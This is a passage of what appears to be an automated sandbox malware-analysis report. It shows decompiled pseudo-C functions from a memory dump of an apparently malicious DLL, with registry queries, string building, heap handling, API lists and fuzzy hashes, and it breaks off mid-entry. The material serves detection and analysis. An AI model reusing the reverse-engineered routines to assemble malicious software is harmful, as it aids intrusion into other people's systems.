0x00e84d47
0x00e84d47
0x00e84d4d
0x00e84d4f
0x00e84d54
0x00e84d5d
0x00e84d65
0x00e84d68
0x00e84d73
0x00e84d77
0x00e84d79
0x00e84d7a
0x00e84d83
0x00e84d87
0x00e84d98
0x00e84d89
0x00e84d8e
0x00e84d93
0x00e84da2
0x00e84da2
0x00e84d77
0x00e84da8
0x00e84dae
0x00e84dae
0x00e84db7
0x00e84dbc
0x00e84dbc
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 00E84D37
lstrlenW.KERNEL32(?), ref: 00E84D6D
memcpy.NTDLL(00000000,?,00000000,00000000), ref: 00E84D8E
SysFreeString.OLEAUT32(?), ref: 00E84DA2

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: e64e8fcf813d6f98ec6222ea058889a69977acdae5fe76c8970cfeca8ecec737
Instruction ID: 79678a3725e7eca1cc6ea2be348c200ccea3bd289d3103a82a300e799a89085a
Opcode Fuzzy Hash: e64e8fcf813d6f98ec6222ea058889a69977acdae5fe76c8970cfeca8ecec737
Instruction Fuzzy Hash: 0A2130B590021AEFCB11EFA4D8849DEBBF9FF48305B108169E90DE7290E730DA45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E81AB8, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E81AB8(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E00E84C8C(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0xe8a2d4; // 0x460d5a8
				_t4 = _t24 + 0xe8bd60; // 0x5499308
				_t5 = _t24 + 0xe8bd08; // 0x4f0053
				_t26 = E00E85384( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0xe8a2d4; // 0x460d5a8
						_t11 = _t32 + 0xe8bd54; // 0x54992fc
						_t48 = _t11;
						_t12 = _t32 + 0xe8bd08; // 0x4f0053
						_t52 = E00E85D37(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0xe8a2d4; // 0x460d5a8
							_t13 = _t35 + 0xe8bd9e; // 0x30314549
							if(E00E874B6(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0xe8a2b4 - 6;
								if( *0xe8a2b4 <= 6) {
									_t42 =  *0xe8a2d4; // 0x460d5a8
									_t15 = _t42 + 0xe8bbaa; // 0x52384549
									E00E874B6(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0xe8a2d4; // 0x460d5a8
							_t17 = _t38 + 0xe8bd98; // 0x5499340
							_t18 = _t38 + 0xe8bd70; // 0x680043
							_t40 = E00E81F7A(_v8, 0x80000001, _t52, _t18, _t17); // executed
							_t45 = _t40;
							HeapFree( *0xe8a290, 0, _t52);
						}
					}
					HeapFree( *0xe8a290, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E00E83C84(_t54);
				}
				return _t45;
			}

0x00e81ab8
0x00e81ac8
0x00e81acb
0x00e81ad2
0x00e81ad4
0x00e81ad4
0x00e81ad7
0x00e81adc
0x00e81ae3
0x00e81af0
0x00e81af5
0x00e81af9
0x00e81b07
0x00e81b15
0x00e81b19
0x00e81baa
0x00e81baa
0x00e81b1f
0x00e81b1f
0x00e81b24
0x00e81b24
0x00e81b2b
0x00e81b37
0x00e81b39
0x00e81b3b
0x00e81b3d
0x00e81b44
0x00e81b56
0x00e81b58
0x00e81b5f
0x00e81b61
0x00e81b68
0x00e81b73
0x00e81b73
0x00e81b5f
0x00e81b78
0x00e81b7d
0x00e81b84
0x00e81b94
0x00e81ba2
0x00e81ba4
0x00e81ba4
0x00e81b3b
0x00e81bb6
0x00e81bb6
0x00e81bb8
0x00e81bbd
0x00e81bbf
0x00e81bbf
0x00e81bca

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05499308,00000000,?,74B5F710,00000000,74B5F730), ref: 00E81B07
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05499340,?,00000000,30314549,00000014,004F0053,054992FC), ref: 00E81BA4
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00E820B0), ref: 00E81BB6

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: ba88facc8d9a94ad011082d1f92974b47162743be474d7b1e17386940e4751c9
Instruction ID: 7c78245022ca0e614cf41d3f4245cc1105c002bd3fc05e9b305c69bca7cdbfcc
Opcode Fuzzy Hash: ba88facc8d9a94ad011082d1f92974b47162743be474d7b1e17386940e4751c9
Instruction Fuzzy Hash: 71314C32A00109BFDB21EBE1DD85EAA7BFCEB48704F1900A6B50CB7162D7719A099B51

Uniqueness

Uniqueness Score: -1.00%

Function 00E85F9A, Relevance: 4.6, APIs: 3, Instructions: 82
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00E85F9A(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				long _t29;
				intOrPtr _t33;
				intOrPtr* _t41;
				void* _t42;
				void* _t46;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr _t50;

				_t46 = __edx;
				_t42 = __ecx;
				_t41 = _a16;
				_t47 = __eax;
				_t22 =  *0xe8a2d4; // 0x460d5a8
				_t2 = _t22 + 0xe8b662; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
				if( *0xe8a2a4 >= 5) {
					_push( &_a16);
					_push( &_v8);
					_push( &_v48);
					_t29 = _a4;
					"QQSUVWh"();
					L5:
					_a4 = _t29;
					L6:
					if(_a4 != 0) {
						L9:
						 *0xe8a2a4 =  *0xe8a2a4 + 1;
						L10:
						return _a4;
					}
					_t49 = _a16;
					 *_t47 = _a16;
					_t48 = _v8;
					 *_t41 = E00E8283A(_t49, _t48); // executed
					_t33 = E00E8738C(_t48, _t49); // executed
					if(_t33 != 0) {
						 *_a8 = _t48;
						 *_a12 = _t33;
						if( *0xe8a2a4 < 5) {
							 *0xe8a2a4 =  *0xe8a2a4 & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E00E81492();
					HeapFree( *0xe8a290, 0, _t48);
					goto L9;
				}
				_t50 =  *0xe8a390; // 0x5498d5d
				if(RtlAllocateHeap( *0xe8a290, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t29 = E00E846D1(_a4, _t42, _t46, _t50,  &_v48,  &_v8,  &_a16, _t36); // executed
				goto L5;
			}

0x00e85f9a
0x00e85f9a
0x00e85fa1
0x00e85fa8
0x00e85fac
0x00e85fb1
0x00e85fbc
0x00e85fcc
0x00e8600f
0x00e86013
0x00e86017
0x00e86018
0x00e8601b
0x00e86020
0x00e86020
0x00e86023
0x00e86027
0x00e86061
0x00e86061
0x00e86067
0x00e8606e
0x00e8606e
0x00e86029
0x00e8602c
0x00e8602e
0x00e8603b
0x00e8603d
0x00e86044
0x00e8607b
0x00e86080
0x00e86082
0x00e86084
0x00e86084
0x00000000
0x00e86082
0x00e86046
0x00e8604d
0x00e8605b
0x00000000
0x00e8605b
0x00e85fce
0x00e85fe9
0x00e86003
0x00000000
0x00e86003
0x00e85ffc
0x00000000

APIs

wsprintfA.USER32 ref: 00E85FBC
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00E85FE1

Part of subcall function 00E846D1: GetTickCount.KERNEL32 ref: 00E846E8
Part of subcall function 00E846D1: wsprintfA.USER32 ref: 00E84735
Part of subcall function 00E846D1: wsprintfA.USER32 ref: 00E84752
Part of subcall function 00E846D1: wsprintfA.USER32 ref: 00E84772
Part of subcall function 00E846D1: wsprintfA.USER32 ref: 00E84790
Part of subcall function 00E846D1: wsprintfA.USER32 ref: 00E847B3
Part of subcall function 00E846D1: wsprintfA.USER32 ref: 00E847D4

HeapFree.KERNEL32(00000000,00E820FA,?,?,00E820FA,?), ref: 00E8605B

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: wsprintf$Heap$AllocateCountFreeTick
String ID:
API String ID: 2794511967-0
Opcode ID: 65a435349750838d3e0b27d1af968b3b42404724ac97a066395f7ad4a9447a85
Instruction ID: b93a427cb5503ed47a0bdb9f63d9c84c1d709871132ce4faa250e0f43086bdbd
Opcode Fuzzy Hash: 65a435349750838d3e0b27d1af968b3b42404724ac97a066395f7ad4a9447a85
Instruction Fuzzy Hash: 8B313A71500209EFDB21EF55DC44A9A3BB8FF08354F144062F90DB7261D735A958DBA6

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DDCDA, Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 6E1DDD27

Part of subcall function 6E1DE3BC: RtlInitializeSListHead.NTDLL(6E21CB40), ref: 6E1DE3C1

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E1DDD91
___scrt_fastfail.LIBCMT ref: 6E1DDDDB

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 2097537958-0
Opcode ID: d32d39fa361779e0f7a1d2a1a505ff8ec0291b0b9cd9a98f152ace1e84e2b902
Instruction ID: 5bb4f41757cd3f1bea657ed09e8fd4ddd3fa074dc2458f0592f33a706a42acfa
Opcode Fuzzy Hash: d32d39fa361779e0f7a1d2a1a505ff8ec0291b0b9cd9a98f152ace1e84e2b902
Instruction Fuzzy Hash: 4B215B71A44B41AECF44DBF4D4053DC73A99F1126EF200A55D5469B2C0CB2203CCFEA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E871A5, Relevance: 4.6, APIs: 3, Instructions: 54
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E871A5(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0xe8a2d4; // 0x460d5a8
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0xe8ba30; // 0x4f0053
				_v16 = 4;
				_t31 = E00E83875(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0xe8a2d4; // 0x460d5a8
					_t5 = _t19 + 0xe8ba8c; // 0x6e0049
					_t34 = E00E83875(__ecx, _t5);
					if(_t34 != 0) {
						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E00E850CA(_t34);
					}
					E00E850CA(_t31);
				}
				return _v8;
			}

0x00e871ab
0x00e871b0
0x00e871b5
0x00e871bc
0x00e871c8
0x00e871cc
0x00e871ce
0x00e871d4
0x00e871e0
0x00e871e4
0x00e871f7
0x00e871ff
0x00e87213
0x00e8721b
0x00e8721d
0x00e8721d
0x00e87224
0x00e87224
0x00e8722b
0x00e8722b
0x00e87231
0x00e87236
0x00e8723c

APIs

Part of subcall function 00E83875: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00E871C8,004F0053,00000000,?), ref: 00E8387E
Part of subcall function 00E83875: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00E871C8,004F0053,00000000,?), ref: 00E838A8
Part of subcall function 00E83875: memset.NTDLL ref: 00E838BC

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 00E871F7
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 00E87213
RegCloseKey.ADVAPI32(00000000), ref: 00E87224

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseOpenQueryValuelstrlenmemcpymemset
String ID:
API String ID: 830012212-0
Opcode ID: 899d65216b1d83e346adab60516a0f213c054bbd29a5ee0bb4e466b2d1fb607c
Instruction ID: 189487306633fcfbaf6c54a5d1c126e8cedc7c7b8543148aee686176a7e98512
Opcode Fuzzy Hash: 899d65216b1d83e346adab60516a0f213c054bbd29a5ee0bb4e466b2d1fb607c
Instruction Fuzzy Hash: 4311CC72500209BFEB11EBE5DC85FAEB7FCAB44704F1410A6B60DB7161EB74DA089B61

Uniqueness

Uniqueness Score: -1.00%

Function 00E8181D, Relevance: 3.8, APIs: 3, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E8181D(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed int _t38;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E00E86837(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0xe8a324, 0x110);
					_t27 =  *0xe8a328; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E00E85F68(0x110, _a4, _t27, 0);
					}
					if(E00E82BB0( &_v36) != 0) {
						_t35 = E00E839C5(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
						if(_t35 == 0) {
							_t55 = _v20;
							_v36 =  *_t46;
							_t38 = E00E82BE3(_t55, _a8, _t51, _t46, _a12); // executed
							_v16 = _t38;
							 *(_t55 + 4) = _v36;
							_t20 =  &(_t46[4]); // 0x8b4875fc
							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
							_t57 = _t57 + 0xc;
							E00E850CA(_t55);
						}
					}
					memset(_a4, 0, _t53);
					E00E850CA(_a4);
				}
				return _v16;
			}

0x00e81823
0x00e81828
0x00e81835
0x00e81838
0x00e8183b
0x00e81842
0x00e81845
0x00e81853
0x00e81858
0x00e8185d
0x00e81862
0x00e81864
0x00e8186c
0x00e8186c
0x00e8187b
0x00e81890
0x00e81897
0x00e8189e
0x00e818a4
0x00e818aa
0x00e818b2
0x00e818b8
0x00e818bb
0x00e818c8
0x00e818cd
0x00e818d1
0x00e818d1
0x00e81897
0x00e818dc
0x00e818e7
0x00e818e7
0x00e818f3

APIs

Part of subcall function 00E86837: RtlAllocateHeap.NTDLL(00000000,00000000,00E84197), ref: 00E86843

memcpy.NTDLL(00000000,00000110,00E820FA,00E820FA,?,?,00E820FA,?,?,00E86042,?), ref: 00E81853
memset.NTDLL ref: 00E818C8
memset.NTDLL ref: 00E818DC

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$AllocateHeapmemcpy
String ID:
API String ID: 1529149438-0
Opcode ID: 4cc6c62f83417ac755237116fa4b9f63e25ac95098d92ec1dcead6d10f9c29fb
Instruction ID: b220114f8ef81207472d60dadbbf5f05abea4aa198fd1a46a74711b3ef045b8d
Opcode Fuzzy Hash: 4cc6c62f83417ac755237116fa4b9f63e25ac95098d92ec1dcead6d10f9c29fb
Instruction Fuzzy Hash: B5211B76A00618ABDB11AFA5CC42BAEBBF8AF09750F045065F90CB7251E734DA05CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00E86872, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00E86872(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E00E85C35(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0xe8a2d4; // 0x460d5a8
						_t20 = _t68 + 0xe8b1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E00E837AF(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x00e86878
0x00e8687b
0x00e8688b
0x00e86894
0x00e86898
0x00e86966
0x00e8696c
0x00e8696c
0x00e868b2
0x00e868b7
0x00e868bb
0x00e868c1
0x00e868c6
0x00e868cd
0x00e868dc
0x00e868dc
0x00e868e0
0x00e868e2
0x00e868ee
0x00e868f9
0x00e86904
0x00e86908
0x00e86912
0x00e86916
0x00e86918
0x00e8691d
0x00e86924
0x00e86934
0x00e86934
0x00e8691d
0x00e86916
0x00e86936
0x00e8693b
0x00e86940
0x00e86940
0x00e86946
0x00e8694c
0x00e86951
0x00e86951
0x00e86956
0x00e8695b
0x00e8695b
0x00e86956
0x00e868e0
0x00e8695d
0x00e86963
0x00000000

APIs

Part of subcall function 00E85C35: SysAllocString.OLEAUT32(80000002), ref: 00E85C8C
Part of subcall function 00E85C35: SysFreeString.OLEAUT32(00000000), ref: 00E85CF1

SysFreeString.OLEAUT32(?), ref: 00E86951
SysFreeString.OLEAUT32(00E81E05), ref: 00E8695B

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 65d56dcba333e8676c696ef8d3a852fa3f6cd8b2de00f138cd43fc86ac9147ff
Instruction ID: 9441bfa7d9a6b5e6f8f762e6a1b8de493a8a830af85f81b772bc7d734ba5991b
Opcode Fuzzy Hash: 65d56dcba333e8676c696ef8d3a852fa3f6cd8b2de00f138cd43fc86ac9147ff
Instruction Fuzzy Hash: 10312A72500119AFCB21EFA9CD88C9BBBB9FFC97447144658F81DAB260E7319D51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E2037E2, Relevance: 3.1, APIs: 2, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 6E20358B: GetOEMCP.KERNEL32(00000000,6E2037FD,6E20D971,00000000,00000000,00000000,00000000,?,6E20D971), ref: 6E2035B6

_free.LIBCMT ref: 6E20385A

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 282f260a80cbe238f6bd75fb30ba137e2c43256e9e5210d1e7c5b366407f98b1
Instruction ID: 4fd495bbb2a1673f73e36d55b2f72f9336c3030417fb00d759e14fb99cf2b138
Opcode Fuzzy Hash: 282f260a80cbe238f6bd75fb30ba137e2c43256e9e5210d1e7c5b366407f98b1
Instruction Fuzzy Hash: DE31927290424EAFDB01CF98C848FDE77FABF44324F1144A9E9149B290EB31D951CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E817B0, Relevance: 3.0, APIs: 2, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00E84106), ref: 00E817CA

Part of subcall function 00E86872: SysFreeString.OLEAUT32(?), ref: 00E86951

SysFreeString.OLEAUT32(00000000), ref: 00E8180A

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 9a133c1c01b599aab5f315d8a2015ff50a6fddcbbf88e01b9441d3cdf26ae683
Instruction ID: b1a0ba1ffc384f1a8cc4d4bbb4017e406502f2343b7ccf5f5b64d4ee78d8e3d3
Opcode Fuzzy Hash: 9a133c1c01b599aab5f315d8a2015ff50a6fddcbbf88e01b9441d3cdf26ae683
Instruction Fuzzy Hash: 6D014B7290010ABFDB11AFA9DC099AF7BB9EF48310B144062F90DB6121E7709A199BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E85685, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				signed int _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0xe8a294) == 0) {
						E00E85076();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0xe8a294) == 1) {
						_t10 = E00E86B0F(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}

0x00e8568c
0x00e8568d
0x00e85690
0x00e856c2
0x00e856c4
0x00e856c4
0x00e85692
0x00e85693
0x00e856a8
0x00e856af
0x00e856b1
0x00e856b1
0x00e856af
0x00e85693
0x00e856cc

APIs

InterlockedIncrement.KERNEL32(00E8A294), ref: 00E8569A

Part of subcall function 00E86B0F: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00E86B24

InterlockedDecrement.KERNEL32(00E8A294), ref: 00E856BA

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: 0c10c0d8e88663c5898c372939dbe6696bfbb1731947a4fbdca9b8c75fb3b078
Instruction ID: 70c4a95c88e142f6b782c220b0352b19cf042e0e5a95373c2d7aa97418d62877
Opcode Fuzzy Hash: 0c10c0d8e88663c5898c372939dbe6696bfbb1731947a4fbdca9b8c75fb3b078
Instruction Fuzzy Hash: 3BE04837604B21D7D73137649C04BAD56526B10B48B88A424B44DF1074FE11DC40EBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DC640, Relevance: 1.8, APIs: 1, Instructions: 343COMMON

Download Yara Rule

APIs

GetTempPathA.KERNELBASE(000008DA,?), ref: 6E1DC6F8

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: PathTemp
String ID:
API String ID: 2920410445-0
Opcode ID: 18a21929b48fba404f9c0cca58499309234a91a884e7a85b023db81ba5b5f9fd
Instruction ID: ddb3c9739ccf019c4df0dd3117abfbdb8b43b7c57933021da00f2ae3487aa757
Opcode Fuzzy Hash: 18a21929b48fba404f9c0cca58499309234a91a884e7a85b023db81ba5b5f9fd
Instruction Fuzzy Hash: D8D1C372901515CFCB04CFB8C8996ED7BB2FB8A310B14462DE5119BB88EB345E46DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E84576, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00E84576(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0xe8a2d4; // 0x460d5a8
				_t4 = _t15 + 0xe8b390; // 0x5498938
				_t20 = _t4;
				_t6 = _t15 + 0xe8b124; // 0x650047
				_t17 = E00E86872(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E00E83875(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x00e84580
0x00e84582
0x00e84589
0x00e8458a
0x00e8458b
0x00e8458c
0x00e84592
0x00e84597
0x00e84597
0x00e845a1
0x00e845b3
0x00e845ba
0x00e845e9
0x00e845bc
0x00e845c1
0x00e845e6
0x00e845c3
0x00e845c6
0x00e845cd
0x00e845d8
0x00e845cf
0x00e845d2
0x00e845d2
0x00e845dc
0x00e845dc
0x00e845c1
0x00e845f0

APIs

Part of subcall function 00E86872: SysFreeString.OLEAUT32(?), ref: 00E86951

Part of subcall function 00E83875: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00E871C8,004F0053,00000000,?), ref: 00E8387E
Part of subcall function 00E83875: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00E871C8,004F0053,00000000,?), ref: 00E838A8
Part of subcall function 00E83875: memset.NTDLL ref: 00E838BC

SysFreeString.OLEAUT32(00000000), ref: 00E845DC

Memory Dump Source

